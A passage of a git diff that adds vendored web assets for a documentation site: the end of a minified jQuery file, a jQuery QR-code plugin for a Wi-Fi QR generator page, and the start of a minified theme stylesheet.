+ : i === t
+ ? b.css(n, r, s)
+ : b.style(n, r, i, s);
+ },
+ n,
+ a ? i : t,
+ a,
+ null,
+ );
+ };
+ },
+ );
+ }),
+ (e.jQuery = e.$ = b),
+ 'function' == typeof define &&
+ define.amd &&
+ define.amd.jQuery &&
+ define('jquery', [], function () {
+ return b;
+ });
+})(window);
diff --git a/assets/pages/wifi-qr-generator/jquery.qrcode.min.js b/assets/pages/wifi-qr-generator/jquery.qrcode.min.js
new file mode 100644
index 000000000..63d31f502
--- /dev/null
+++ b/assets/pages/wifi-qr-generator/jquery.qrcode.min.js
@@ -0,0 +1,868 @@
+(function (r) {
+ r.fn.qrcode = function (h) {
+ var s;
+ function u(a) {
+ this.mode = s;
+ this.data = a;
+ }
+ function o(a, c) {
+ this.typeNumber = a;
+ this.errorCorrectLevel = c;
+ this.modules = null;
+ this.moduleCount = 0;
+ this.dataCache = null;
+ this.dataList = [];
+ }
+ function q(a, c) {
+ if (void 0 == a.length) throw Error(a.length + '/' + c);
+ for (var d = 0; d < a.length && 0 == a[d]; ) d++;
+ this.num = Array(a.length - d + c);
+ for (var b = 0; b < a.length - d; b++) this.num[b] = a[b + d];
+ }
+ function p(a, c) {
+ this.totalCount = a;
+ this.dataCount = c;
+ }
+ function t() {
+ this.buffer = [];
+ this.length = 0;
+ }
+ u.prototype = {
+ getLength: function () {
+ return this.data.length;
+ },
+ write: function (a) {
+ for (var c = 0; c < this.data.length; c++)
+ a.put(this.data.charCodeAt(c), 8);
+ },
+ };
+ o.prototype = {
+ addData: function (a) {
+ this.dataList.push(new u(a));
+ this.dataCache = null;
+ },
+ isDark: function (a, c) {
+ if (
+ 0 > a ||
+ this.moduleCount <= a ||
+ 0 > c ||
+ this.moduleCount <= c
+ )
+ throw Error(a + ',' + c);
+ return this.modules[a][c];
+ },
+ getModuleCount: function () {
+ return this.moduleCount;
+ },
+ make: function () {
+ if (1 > this.typeNumber) {
+ for (var a = 1, a = 1; 40 > a; a++) {
+ for (
+ var c = p.getRSBlocks(a, this.errorCorrectLevel),
+ d = new t(),
+ b = 0,
+ e = 0;
+ e < c.length;
+ e++
+ )
+ b += c[e].dataCount;
+ for (e = 0; e < this.dataList.length; e++)
+ (c = this.dataList[e]),
+ d.put(c.mode, 4),
+ d.put(
+ c.getLength(),
+ j.getLengthInBits(c.mode, a),
+ ),
+ c.write(d);
+ if (d.getLengthInBits() <= 8 * b) break;
+ }
+ this.typeNumber = a;
+ }
+ this.makeImpl(!1, this.getBestMaskPattern());
+ },
+ makeImpl: function (a, c) {
+ this.moduleCount = 4 * this.typeNumber + 17;
+ this.modules = Array(this.moduleCount);
+ for (var d = 0; d < this.moduleCount; d++) {
+ this.modules[d] = Array(this.moduleCount);
+ for (var b = 0; b < this.moduleCount; b++)
+ this.modules[d][b] = null;
+ }
+ this.setupPositionProbePattern(0, 0);
+ this.setupPositionProbePattern(this.moduleCount - 7, 0);
+ this.setupPositionProbePattern(0, this.moduleCount - 7);
+ this.setupPositionAdjustPattern();
+ this.setupTimingPattern();
+ this.setupTypeInfo(a, c);
+ 7 <= this.typeNumber && this.setupTypeNumber(a);
+ null == this.dataCache &&
+ (this.dataCache = o.createData(
+ this.typeNumber,
+ this.errorCorrectLevel,
+ this.dataList,
+ ));
+ this.mapData(this.dataCache, c);
+ },
+ setupPositionProbePattern: function (a, c) {
+ for (var d = -1; 7 >= d; d++)
+ if (!(-1 >= a + d || this.moduleCount <= a + d))
+ for (var b = -1; 7 >= b; b++)
+ -1 >= c + b ||
+ this.moduleCount <= c + b ||
+ (this.modules[a + d][c + b] =
+ (0 <= d && 6 >= d && (0 == b || 6 == b)) ||
+ (0 <= b && 6 >= b && (0 == d || 6 == d)) ||
+ (2 <= d && 4 >= d && 2 <= b && 4 >= b)
+ ? !0
+ : !1);
+ },
+ getBestMaskPattern: function () {
+ for (var a = 0, c = 0, d = 0; 8 > d; d++) {
+ this.makeImpl(!0, d);
+ var b = j.getLostPoint(this);
+ if (0 == d || a > b) (a = b), (c = d);
+ }
+ return c;
+ },
+ createMovieClip: function (a, c, d) {
+ a = a.createEmptyMovieClip(c, d);
+ this.make();
+ for (c = 0; c < this.modules.length; c++)
+ for (
+ var d = 1 * c, b = 0;
+ b < this.modules[c].length;
+ b++
+ ) {
+ var e = 1 * b;
+ this.modules[c][b] &&
+ (a.beginFill(0, 100),
+ a.moveTo(e, d),
+ a.lineTo(e + 1, d),
+ a.lineTo(e + 1, d + 1),
+ a.lineTo(e, d + 1),
+ a.endFill());
+ }
+ return a;
+ },
+ setupTimingPattern: function () {
+ for (var a = 8; a < this.moduleCount - 8; a++)
+ null == this.modules[a][6] &&
+ (this.modules[a][6] = 0 == a % 2);
+ for (a = 8; a < this.moduleCount - 8; a++)
+ null == this.modules[6][a] &&
+ (this.modules[6][a] = 0 == a % 2);
+ },
+ setupPositionAdjustPattern: function () {
+ for (
+ var a = j.getPatternPosition(this.typeNumber), c = 0;
+ c < a.length;
+ c++
+ )
+ for (var d = 0; d < a.length; d++) {
+ var b = a[c],
+ e = a[d];
+ if (null == this.modules[b][e])
+ for (var f = -2; 2 >= f; f++)
+ for (var i = -2; 2 >= i; i++)
+ this.modules[b + f][e + i] =
+ -2 == f ||
+ 2 == f ||
+ -2 == i ||
+ 2 == i ||
+ (0 == f && 0 == i)
+ ? !0
+ : !1;
+ }
+ },
+ setupTypeNumber: function (a) {
+ for (
+ var c = j.getBCHTypeNumber(this.typeNumber), d = 0;
+ 18 > d;
+ d++
+ ) {
+ var b = !a && 1 == ((c >> d) & 1);
+ this.modules[Math.floor(d / 3)][
+ (d % 3) + this.moduleCount - 8 - 3
+ ] = b;
+ }
+ for (d = 0; 18 > d; d++)
+ (b = !a && 1 == ((c >> d) & 1)),
+ (this.modules[(d % 3) + this.moduleCount - 8 - 3][
+ Math.floor(d / 3)
+ ] = b);
+ },
+ setupTypeInfo: function (a, c) {
+ for (
+ var d = j.getBCHTypeInfo((this.errorCorrectLevel << 3) | c),
+ b = 0;
+ 15 > b;
+ b++
+ ) {
+ var e = !a && 1 == ((d >> b) & 1);
+ 6 > b
+ ? (this.modules[b][8] = e)
+ : 8 > b
+ ? (this.modules[b + 1][8] = e)
+ : (this.modules[this.moduleCount - 15 + b][8] = e);
+ }
+ for (b = 0; 15 > b; b++)
+ (e = !a && 1 == ((d >> b) & 1)),
+ 8 > b
+ ? (this.modules[8][this.moduleCount - b - 1] = e)
+ : 9 > b
+ ? (this.modules[8][15 - b - 1 + 1] = e)
+ : (this.modules[8][15 - b - 1] = e);
+ this.modules[this.moduleCount - 8][8] = !a;
+ },
+ mapData: function (a, c) {
+ for (
+ var d = -1,
+ b = this.moduleCount - 1,
+ e = 7,
+ f = 0,
+ i = this.moduleCount - 1;
+ 0 < i;
+ i -= 2
+ )
+ for (6 == i && i--; ; ) {
+ for (var g = 0; 2 > g; g++)
+ if (null == this.modules[b][i - g]) {
+ var n = !1;
+ f < a.length && (n = 1 == ((a[f] >>> e) & 1));
+ j.getMask(c, b, i - g) && (n = !n);
+ this.modules[b][i - g] = n;
+ e--;
+ -1 == e && (f++, (e = 7));
+ }
+ b += d;
+ if (0 > b || this.moduleCount <= b) {
+ b -= d;
+ d = -d;
+ break;
+ }
+ }
+ },
+ };
+ o.PAD0 = 236;
+ o.PAD1 = 17;
+ o.createData = function (a, c, d) {
+ for (
+ var c = p.getRSBlocks(a, c), b = new t(), e = 0;
+ e < d.length;
+ e++
+ ) {
+ var f = d[e];
+ b.put(f.mode, 4);
+ b.put(f.getLength(), j.getLengthInBits(f.mode, a));
+ f.write(b);
+ }
+ for (e = a = 0; e < c.length; e++) a += c[e].dataCount;
+ if (b.getLengthInBits() > 8 * a)
+ throw Error(
+ 'code length overflow. (' +
+ b.getLengthInBits() +
+ '>' +
+ 8 * a +
+ ')',
+ );
+ for (
+ b.getLengthInBits() + 4 <= 8 * a && b.put(0, 4);
+ 0 != b.getLengthInBits() % 8;
+
+ )
+ b.putBit(!1);
+ for (; !(b.getLengthInBits() >= 8 * a); ) {
+ b.put(o.PAD0, 8);
+ if (b.getLengthInBits() >= 8 * a) break;
+ b.put(o.PAD1, 8);
+ }
+ return o.createBytes(b, c);
+ };
+ o.createBytes = function (a, c) {
+ for (
+ var d = 0,
+ b = 0,
+ e = 0,
+ f = Array(c.length),
+ i = Array(c.length),
+ g = 0;
+ g < c.length;
+ g++
+ ) {
+ var n = c[g].dataCount,
+ h = c[g].totalCount - n,
+ b = Math.max(b, n),
+ e = Math.max(e, h);
+ f[g] = Array(n);
+ for (var k = 0; k < f[g].length; k++)
+ f[g][k] = 255 & a.buffer[k + d];
+ d += n;
+ k = j.getErrorCorrectPolynomial(h);
+ n = new q(f[g], k.getLength() - 1).mod(k);
+ i[g] = Array(k.getLength() - 1);
+ for (k = 0; k < i[g].length; k++)
+ (h = k + n.getLength() - i[g].length),
+ (i[g][k] = 0 <= h ? n.get(h) : 0);
+ }
+ for (k = g = 0; k < c.length; k++) g += c[k].totalCount;
+ d = Array(g);
+ for (k = n = 0; k < b; k++)
+ for (g = 0; g < c.length; g++)
+ k < f[g].length && (d[n++] = f[g][k]);
+ for (k = 0; k < e; k++)
+ for (g = 0; g < c.length; g++)
+ k < i[g].length && (d[n++] = i[g][k]);
+ return d;
+ };
+ s = 4;
+ for (
+ var j = {
+ PATTERN_POSITION_TABLE: [
+ [],
+ [6, 18],
+ [6, 22],
+ [6, 26],
+ [6, 30],
+ [6, 34],
+ [6, 22, 38],
+ [6, 24, 42],
+ [6, 26, 46],
+ [6, 28, 50],
+ [6, 30, 54],
+ [6, 32, 58],
+ [6, 34, 62],
+ [6, 26, 46, 66],
+ [6, 26, 48, 70],
+ [6, 26, 50, 74],
+ [6, 30, 54, 78],
+ [6, 30, 56, 82],
+ [6, 30, 58, 86],
+ [6, 34, 62, 90],
+ [6, 28, 50, 72, 94],
+ [6, 26, 50, 74, 98],
+ [6, 30, 54, 78, 102],
+ [6, 28, 54, 80, 106],
+ [6, 32, 58, 84, 110],
+ [6, 30, 58, 86, 114],
+ [6, 34, 62, 90, 118],
+ [6, 26, 50, 74, 98, 122],
+ [6, 30, 54, 78, 102, 126],
+ [6, 26, 52, 78, 104, 130],
+ [6, 30, 56, 82, 108, 134],
+ [6, 34, 60, 86, 112, 138],
+ [6, 30, 58, 86, 114, 142],
+ [6, 34, 62, 90, 118, 146],
+ [6, 30, 54, 78, 102, 126, 150],
+ [6, 24, 50, 76, 102, 128, 154],
+ [6, 28, 54, 80, 106, 132, 158],
+ [6, 32, 58, 84, 110, 136, 162],
+ [6, 26, 54, 82, 110, 138, 166],
+ [6, 30, 58, 86, 114, 142, 170],
+ ],
+ G15: 1335,
+ G18: 7973,
+ G15_MASK: 21522,
+ getBCHTypeInfo: function (a) {
+ for (
+ var c = a << 10;
+ 0 <= j.getBCHDigit(c) - j.getBCHDigit(j.G15);
+
+ )
+ c ^=
+ j.G15 <<
+ (j.getBCHDigit(c) - j.getBCHDigit(j.G15));
+ return ((a << 10) | c) ^ j.G15_MASK;
+ },
+ getBCHTypeNumber: function (a) {
+ for (
+ var c = a << 12;
+ 0 <= j.getBCHDigit(c) - j.getBCHDigit(j.G18);
+
+ )
+ c ^=
+ j.G18 <<
+ (j.getBCHDigit(c) - j.getBCHDigit(j.G18));
+ return (a << 12) | c;
+ },
+ getBCHDigit: function (a) {
+ for (var c = 0; 0 != a; ) c++, (a >>>= 1);
+ return c;
+ },
+ getPatternPosition: function (a) {
+ return j.PATTERN_POSITION_TABLE[a - 1];
+ },
+ getMask: function (a, c, d) {
+ switch (a) {
+ case 0:
+ return 0 == (c + d) % 2;
+ case 1:
+ return 0 == c % 2;
+ case 2:
+ return 0 == d % 3;
+ case 3:
+ return 0 == (c + d) % 3;
+ case 4:
+ return (
+ 0 ==
+ (Math.floor(c / 2) + Math.floor(d / 3)) % 2
+ );
+ case 5:
+ return 0 == ((c * d) % 2) + ((c * d) % 3);
+ case 6:
+ return 0 == (((c * d) % 2) + ((c * d) % 3)) % 2;
+ case 7:
+ return 0 == (((c * d) % 3) + ((c + d) % 2)) % 2;
+ default:
+ throw Error('bad maskPattern:' + a);
+ }
+ },
+ getErrorCorrectPolynomial: function (a) {
+ for (var c = new q([1], 0), d = 0; d < a; d++)
+ c = c.multiply(new q([1, l.gexp(d)], 0));
+ return c;
+ },
+ getLengthInBits: function (a, c) {
+ if (1 <= c && 10 > c)
+ switch (a) {
+ case 1:
+ return 10;
+ case 2:
+ return 9;
+ case s:
+ return 8;
+ case 8:
+ return 8;
+ default:
+ throw Error('mode:' + a);
+ }
+ else if (27 > c)
+ switch (a) {
+ case 1:
+ return 12;
+ case 2:
+ return 11;
+ case s:
+ return 16;
+ case 8:
+ return 10;
+ default:
+ throw Error('mode:' + a);
+ }
+ else if (41 > c)
+ switch (a) {
+ case 1:
+ return 14;
+ case 2:
+ return 13;
+ case s:
+ return 16;
+ case 8:
+ return 12;
+ default:
+ throw Error('mode:' + a);
+ }
+ else throw Error('type:' + c);
+ },
+ getLostPoint: function (a) {
+ for (
+ var c = a.getModuleCount(), d = 0, b = 0;
+ b < c;
+ b++
+ )
+ for (var e = 0; e < c; e++) {
+ for (
+ var f = 0, i = a.isDark(b, e), g = -1;
+ 1 >= g;
+ g++
+ )
+ if (!(0 > b + g || c <= b + g))
+ for (var h = -1; 1 >= h; h++)
+ 0 > e + h ||
+ c <= e + h ||
+ (0 == g && 0 == h) ||
+ (i == a.isDark(b + g, e + h) &&
+ f++);
+ 5 < f && (d += 3 + f - 5);
+ }
+ for (b = 0; b < c - 1; b++)
+ for (e = 0; e < c - 1; e++)
+ if (
+ ((f = 0),
+ a.isDark(b, e) && f++,
+ a.isDark(b + 1, e) && f++,
+ a.isDark(b, e + 1) && f++,
+ a.isDark(b + 1, e + 1) && f++,
+ 0 == f || 4 == f)
+ )
+ d += 3;
+ for (b = 0; b < c; b++)
+ for (e = 0; e < c - 6; e++)
+ a.isDark(b, e) &&
+ !a.isDark(b, e + 1) &&
+ a.isDark(b, e + 2) &&
+ a.isDark(b, e + 3) &&
+ a.isDark(b, e + 4) &&
+ !a.isDark(b, e + 5) &&
+ a.isDark(b, e + 6) &&
+ (d += 40);
+ for (e = 0; e < c; e++)
+ for (b = 0; b < c - 6; b++)
+ a.isDark(b, e) &&
+ !a.isDark(b + 1, e) &&
+ a.isDark(b + 2, e) &&
+ a.isDark(b + 3, e) &&
+ a.isDark(b + 4, e) &&
+ !a.isDark(b + 5, e) &&
+ a.isDark(b + 6, e) &&
+ (d += 40);
+ for (e = f = 0; e < c; e++)
+ for (b = 0; b < c; b++) a.isDark(b, e) && f++;
+ a = Math.abs((100 * f) / c / c - 50) / 5;
+ return d + 10 * a;
+ },
+ },
+ l = {
+ glog: function (a) {
+ if (1 > a) throw Error('glog(' + a + ')');
+ return l.LOG_TABLE[a];
+ },
+ gexp: function (a) {
+ for (; 0 > a; ) a += 255;
+ for (; 256 <= a; ) a -= 255;
+ return l.EXP_TABLE[a];
+ },
+ EXP_TABLE: Array(256),
+ LOG_TABLE: Array(256),
+ },
+ m = 0;
+ 8 > m;
+ m++
+ )
+ l.EXP_TABLE[m] = 1 << m;
+ for (m = 8; 256 > m; m++)
+ l.EXP_TABLE[m] =
+ l.EXP_TABLE[m - 4] ^
+ l.EXP_TABLE[m - 5] ^
+ l.EXP_TABLE[m - 6] ^
+ l.EXP_TABLE[m - 8];
+ for (m = 0; 255 > m; m++) l.LOG_TABLE[l.EXP_TABLE[m]] = m;
+ q.prototype = {
+ get: function (a) {
+ return this.num[a];
+ },
+ getLength: function () {
+ return this.num.length;
+ },
+ multiply: function (a) {
+ for (
+ var c = Array(this.getLength() + a.getLength() - 1), d = 0;
+ d < this.getLength();
+ d++
+ )
+ for (var b = 0; b < a.getLength(); b++)
+ c[d + b] ^= l.gexp(
+ l.glog(this.get(d)) + l.glog(a.get(b)),
+ );
+ return new q(c, 0);
+ },
+ mod: function (a) {
+ if (0 > this.getLength() - a.getLength()) return this;
+ for (
+ var c = l.glog(this.get(0)) - l.glog(a.get(0)),
+ d = Array(this.getLength()),
+ b = 0;
+ b < this.getLength();
+ b++
+ )
+ d[b] = this.get(b);
+ for (b = 0; b < a.getLength(); b++)
+ d[b] ^= l.gexp(l.glog(a.get(b)) + c);
+ return new q(d, 0).mod(a);
+ },
+ };
+ p.RS_BLOCK_TABLE = [
+ [1, 26, 19],
+ [1, 26, 16],
+ [1, 26, 13],
+ [1, 26, 9],
+ [1, 44, 34],
+ [1, 44, 28],
+ [1, 44, 22],
+ [1, 44, 16],
+ [1, 70, 55],
+ [1, 70, 44],
+ [2, 35, 17],
+ [2, 35, 13],
+ [1, 100, 80],
+ [2, 50, 32],
+ [2, 50, 24],
+ [4, 25, 9],
+ [1, 134, 108],
+ [2, 67, 43],
+ [2, 33, 15, 2, 34, 16],
+ [2, 33, 11, 2, 34, 12],
+ [2, 86, 68],
+ [4, 43, 27],
+ [4, 43, 19],
+ [4, 43, 15],
+ [2, 98, 78],
+ [4, 49, 31],
+ [2, 32, 14, 4, 33, 15],
+ [4, 39, 13, 1, 40, 14],
+ [2, 121, 97],
+ [2, 60, 38, 2, 61, 39],
+ [4, 40, 18, 2, 41, 19],
+ [4, 40, 14, 2, 41, 15],
+ [2, 146, 116],
+ [3, 58, 36, 2, 59, 37],
+ [4, 36, 16, 4, 37, 17],
+ [4, 36, 12, 4, 37, 13],
+ [2, 86, 68, 2, 87, 69],
+ [4, 69, 43, 1, 70, 44],
+ [6, 43, 19, 2, 44, 20],
+ [6, 43, 15, 2, 44, 16],
+ [4, 101, 81],
+ [1, 80, 50, 4, 81, 51],
+ [4, 50, 22, 4, 51, 23],
+ [3, 36, 12, 8, 37, 13],
+ [2, 116, 92, 2, 117, 93],
+ [6, 58, 36, 2, 59, 37],
+ [4, 46, 20, 6, 47, 21],
+ [7, 42, 14, 4, 43, 15],
+ [4, 133, 107],
+ [8, 59, 37, 1, 60, 38],
+ [8, 44, 20, 4, 45, 21],
+ [12, 33, 11, 4, 34, 12],
+ [3, 145, 115, 1, 146, 116],
+ [4, 64, 40, 5, 65, 41],
+ [11, 36, 16, 5, 37, 17],
+ [11, 36, 12, 5, 37, 13],
+ [5, 109, 87, 1, 110, 88],
+ [5, 65, 41, 5, 66, 42],
+ [5, 54, 24, 7, 55, 25],
+ [11, 36, 12],
+ [5, 122, 98, 1, 123, 99],
+ [7, 73, 45, 3, 74, 46],
+ [15, 43, 19, 2, 44, 20],
+ [3, 45, 15, 13, 46, 16],
+ [1, 135, 107, 5, 136, 108],
+ [10, 74, 46, 1, 75, 47],
+ [1, 50, 22, 15, 51, 23],
+ [2, 42, 14, 17, 43, 15],
+ [5, 150, 120, 1, 151, 121],
+ [9, 69, 43, 4, 70, 44],
+ [17, 50, 22, 1, 51, 23],
+ [2, 42, 14, 19, 43, 15],
+ [3, 141, 113, 4, 142, 114],
+ [3, 70, 44, 11, 71, 45],
+ [17, 47, 21, 4, 48, 22],
+ [9, 39, 13, 16, 40, 14],
+ [3, 135, 107, 5, 136, 108],
+ [3, 67, 41, 13, 68, 42],
+ [15, 54, 24, 5, 55, 25],
+ [15, 43, 15, 10, 44, 16],
+ [4, 144, 116, 4, 145, 117],
+ [17, 68, 42],
+ [17, 50, 22, 6, 51, 23],
+ [19, 46, 16, 6, 47, 17],
+ [2, 139, 111, 7, 140, 112],
+ [17, 74, 46],
+ [7, 54, 24, 16, 55, 25],
+ [34, 37, 13],
+ [4, 151, 121, 5, 152, 122],
+ [4, 75, 47, 14, 76, 48],
+ [11, 54, 24, 14, 55, 25],
+ [16, 45, 15, 14, 46, 16],
+ [6, 147, 117, 4, 148, 118],
+ [6, 73, 45, 14, 74, 46],
+ [11, 54, 24, 16, 55, 25],
+ [30, 46, 16, 2, 47, 17],
+ [8, 132, 106, 4, 133, 107],
+ [8, 75, 47, 13, 76, 48],
+ [7, 54, 24, 22, 55, 25],
+ [22, 45, 15, 13, 46, 16],
+ [10, 142, 114, 2, 143, 115],
+ [19, 74, 46, 4, 75, 47],
+ [28, 50, 22, 6, 51, 23],
+ [33, 46, 16, 4, 47, 17],
+ [8, 152, 122, 4, 153, 123],
+ [22, 73, 45, 3, 74, 46],
+ [8, 53, 23, 26, 54, 24],
+ [12, 45, 15, 28, 46, 16],
+ [3, 147, 117, 10, 148, 118],
+ [3, 73, 45, 23, 74, 46],
+ [4, 54, 24, 31, 55, 25],
+ [11, 45, 15, 31, 46, 16],
+ [7, 146, 116, 7, 147, 117],
+ [21, 73, 45, 7, 74, 46],
+ [1, 53, 23, 37, 54, 24],
+ [19, 45, 15, 26, 46, 16],
+ [5, 145, 115, 10, 146, 116],
+ [19, 75, 47, 10, 76, 48],
+ [15, 54, 24, 25, 55, 25],
+ [23, 45, 15, 25, 46, 16],
+ [13, 145, 115, 3, 146, 116],
+ [2, 74, 46, 29, 75, 47],
+ [42, 54, 24, 1, 55, 25],
+ [23, 45, 15, 28, 46, 16],
+ [17, 145, 115],
+ [10, 74, 46, 23, 75, 47],
+ [10, 54, 24, 35, 55, 25],
+ [19, 45, 15, 35, 46, 16],
+ [17, 145, 115, 1, 146, 116],
+ [14, 74, 46, 21, 75, 47],
+ [29, 54, 24, 19, 55, 25],
+ [11, 45, 15, 46, 46, 16],
+ [13, 145, 115, 6, 146, 116],
+ [14, 74, 46, 23, 75, 47],
+ [44, 54, 24, 7, 55, 25],
+ [59, 46, 16, 1, 47, 17],
+ [12, 151, 121, 7, 152, 122],
+ [12, 75, 47, 26, 76, 48],
+ [39, 54, 24, 14, 55, 25],
+ [22, 45, 15, 41, 46, 16],
+ [6, 151, 121, 14, 152, 122],
+ [6, 75, 47, 34, 76, 48],
+ [46, 54, 24, 10, 55, 25],
+ [2, 45, 15, 64, 46, 16],
+ [17, 152, 122, 4, 153, 123],
+ [29, 74, 46, 14, 75, 47],
+ [49, 54, 24, 10, 55, 25],
+ [24, 45, 15, 46, 46, 16],
+ [4, 152, 122, 18, 153, 123],
+ [13, 74, 46, 32, 75, 47],
+ [48, 54, 24, 14, 55, 25],
+ [42, 45, 15, 32, 46, 16],
+ [20, 147, 117, 4, 148, 118],
+ [40, 75, 47, 7, 76, 48],
+ [43, 54, 24, 22, 55, 25],
+ [10, 45, 15, 67, 46, 16],
+ [19, 148, 118, 6, 149, 119],
+ [18, 75, 47, 31, 76, 48],
+ [34, 54, 24, 34, 55, 25],
+ [20, 45, 15, 61, 46, 16],
+ ];
+ p.getRSBlocks = function (a, c) {
+ var d = p.getRsBlockTable(a, c);
+ if (void 0 == d)
+ throw Error(
+ 'bad rs block @ typeNumber:' +
+ a +
+ '/errorCorrectLevel:' +
+ c,
+ );
+ for (var b = d.length / 3, e = [], f = 0; f < b; f++)
+ for (
+ var h = d[3 * f + 0],
+ g = d[3 * f + 1],
+ j = d[3 * f + 2],
+ l = 0;
+ l < h;
+ l++
+ )
+ e.push(new p(g, j));
+ return e;
+ };
+ p.getRsBlockTable = function (a, c) {
+ switch (c) {
+ case 1:
+ return p.RS_BLOCK_TABLE[4 * (a - 1) + 0];
+ case 0:
+ return p.RS_BLOCK_TABLE[4 * (a - 1) + 1];
+ case 3:
+ return p.RS_BLOCK_TABLE[4 * (a - 1) + 2];
+ case 2:
+ return p.RS_BLOCK_TABLE[4 * (a - 1) + 3];
+ }
+ };
+ t.prototype = {
+ get: function (a) {
+ return (
+ 1 ==
+ ((this.buffer[Math.floor(a / 8)] >>> (7 - (a % 8))) & 1)
+ );
+ },
+ put: function (a, c) {
+ for (var d = 0; d < c; d++)
+ this.putBit(1 == ((a >>> (c - d - 1)) & 1));
+ },
+ getLengthInBits: function () {
+ return this.length;
+ },
+ putBit: function (a) {
+ var c = Math.floor(this.length / 8);
+ this.buffer.length <= c && this.buffer.push(0);
+ a && (this.buffer[c] |= 128 >>> this.length % 8);
+ this.length++;
+ },
+ };
+ 'string' === typeof h && (h = {text: h});
+ h = r.extend(
+ {},
+ {
+ render: 'canvas',
+ width: 256,
+ height: 256,
+ typeNumber: -1,
+ correctLevel: 2,
+ background: '#ffffff',
+ foreground: '#000000',
+ },
+ h,
+ );
+ return this.each(function () {
+ var a;
+ if ('canvas' == h.render) {
+ a = new o(h.typeNumber, h.correctLevel);
+ a.addData(h.text);
+ a.make();
+ var c = document.createElement('canvas');
+ c.width = h.width;
+ c.height = h.height;
+ for (
+ var d = c.getContext('2d'),
+ b = h.width / a.getModuleCount(),
+ e = h.height / a.getModuleCount(),
+ f = 0;
+ f < a.getModuleCount();
+ f++
+ )
+ for (var i = 0; i < a.getModuleCount(); i++) {
+ d.fillStyle = a.isDark(f, i)
+ ? h.foreground
+ : h.background;
+ var g = Math.ceil((i + 1) * b) - Math.floor(i * b),
+ j = Math.ceil((f + 1) * b) - Math.floor(f * b);
+ d.fillRect(Math.round(i * b), Math.round(f * e), g, j);
+ }
+ } else {
+ a = new o(h.typeNumber, h.correctLevel);
+ a.addData(h.text);
+ a.make();
+ c = r('
')
+ .css('width', h.width + 'px')
+ .css('height', h.height + 'px')
+ .css('border', '0px')
+ .css('border-collapse', 'collapse')
+ .css('background-color', h.background);
+ d = h.width / a.getModuleCount();
+ b = h.height / a.getModuleCount();
+ for (e = 0; e < a.getModuleCount(); e++) {
+ f = r('
')
+ .css('height', b + 'px')
+ .appendTo(c);
+ for (i = 0; i < a.getModuleCount(); i++)
+ r('
')
+ .css('width', d + 'px')
+ .css(
+ 'background-color',
+ a.isDark(e, i) ? h.foreground : h.background,
+ )
+ .appendTo(f);
+ }
+ }
+ a = c;
+ jQuery(a).appendTo(this);
+ });
+ };
+})(jQuery);
diff --git a/assets/stylesheets/main.26e3688c.min.css b/assets/stylesheets/main.26e3688c.min.css
new file mode 100644
index 000000000..d6684d58a
--- /dev/null
+++ b/assets/stylesheets/main.26e3688c.min.css
@@ -0,0 +1 @@
+@charset "UTF-8";html{-webkit-text-size-adjust:none;-moz-text-size-adjust:none;text-size-adjust:none;box-sizing:border-box}*,:after,:before{box-sizing:inherit}@media (prefers-reduced-motion){*,:after,:before{transition:none!important}}body{margin:0}a,button,input,label{-webkit-tap-highlight-color:transparent}a{color:inherit;text-decoration:none}hr{border:0;box-sizing:initial;display:block;height:.05rem;overflow:visible;padding:0}small{font-size:80%}sub,sup{line-height:1em}img{border-style:none}table{border-collapse:initial;border-spacing:0}td,th{font-weight:400;vertical-align:top}button{background:#0000;border:0;font-family:inherit;font-size:inherit;margin:0;padding:0}input{border:0;outline:none}:root{--md-primary-fg-color:#4051b5;--md-primary-fg-color--light:#5d6cc0;--md-primary-fg-color--dark:#303fa1;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3;--md-accent-fg-color:#526cfe;--md-accent-fg-color--transparent:#526cfe1a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-scheme=default]{color-scheme:light}[data-md-color-scheme=default] img[src$="#gh-dark-mode-only"],[data-md-color-scheme=default] img[src$="#only-dark"]{display:none}:root,[data-md-color-scheme=default]{--md-default-fg-color:#000000de;--md-default-fg-color--light:#0000008a;--md-default-fg-color--lighter:#00000052;--md-default-fg-color--lightest:#00000012;--md-default-bg-color:#fff;--md-default-bg-color--light:#ffffffb3;--md-default-bg-color--lighter:#ffffff4d;--md-default-bg-color--lightest:#ffffff1f;--md-code-fg-color:#36464e;--md-code-bg-color:#f5f5f5;--md-code-hl-color:#ffff0080;--md-code-hl-number-color:#d52a2a;--md-code-hl-special-color:#db1457;--md-code-hl-function-color:#a846b9;--md-code-hl-constant-color:#6e59d9;--md-code-hl-keyword-color:#3f6ec6;--md-code-hl-string-color:#1c7d4d;--md-code-hl-name-color:var(--md-code-fg-color);--md-code-hl-operator-color:var(--md-default-fg-color--light);--md-code-hl-punctuation-color:var(--md-default-fg-color--light);--md-code-hl-comment-color:var(--md-default-fg-color--light);--md-code-hl-generic-color:var(--md-default-fg-color--light);--md-code-hl-variable-color:var(--md-default-fg-color--light);--md-typeset-color:var(--md-default-fg-color);--md-typeset-a-color:var(--md-primary-fg-color);--md-typeset-mark-color:#ffff0080;--md-typeset-del-color:#f5503d26;--md-typeset-ins-color:#0bd57026;--md-typeset-kbd-color:#fafafa;--md-typeset-kbd-accent-color:#fff;--md-typeset-kbd-border-color:#b8b8b8;--md-typeset-table-color:#0000001f;--md-typeset-table-color--light:rgba(0,0,0,.035);--md-admonition-fg-color:var(--md-default-fg-color);--md-admonition-bg-color:var(--md-default-bg-color);--md-warning-fg-color:#000000de;--md-warning-bg-color:#ff9;--md-footer-fg-color:#fff;--md-footer-fg-color--light:#ffffffb3;--md-footer-fg-color--lighter:#ffffff73;--md-footer-bg-color:#000000de;--md-footer-bg-color--dark:#00000052;--md-shadow-z1:0 0.2rem 0.5rem #0000000d,0 0 0.05rem #0000001a;--md-shadow-z2:0 0.2rem 0.5rem #0000001a,0 0 0.05rem #00000040;--md-shadow-z3:0 0.2rem 0.5rem #0003,0 0 0.05rem #00000059}.md-icon svg{fill:currentcolor;display:block;height:1.2rem;width:1.2rem}body{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;--md-text-font-family:var(--md-text-font,_),-apple-system,BlinkMacSystemFont,Helvetica,Arial,sans-serif;--md-code-font-family:var(--md-code-font,_),SFMono-Regular,Consolas,Menlo,monospace}aside,body,input{font-feature-settings:"kern","liga";color:var(--md-typeset-color);font-family:var(--md-text-font-family)}code,kbd,pre{font-feature-settings:"kern";font-family:var(--md-code-font-family)}:root{--md-typeset-table-sort-icon:url('data:image/svg+xml;charset=utf-8,
');--md-typeset-table-sort-icon--asc:url('data:image/svg+xml;charset=utf-8,
');--md-typeset-table-sort-icon--desc:url('data:image/svg+xml;charset=utf-8,
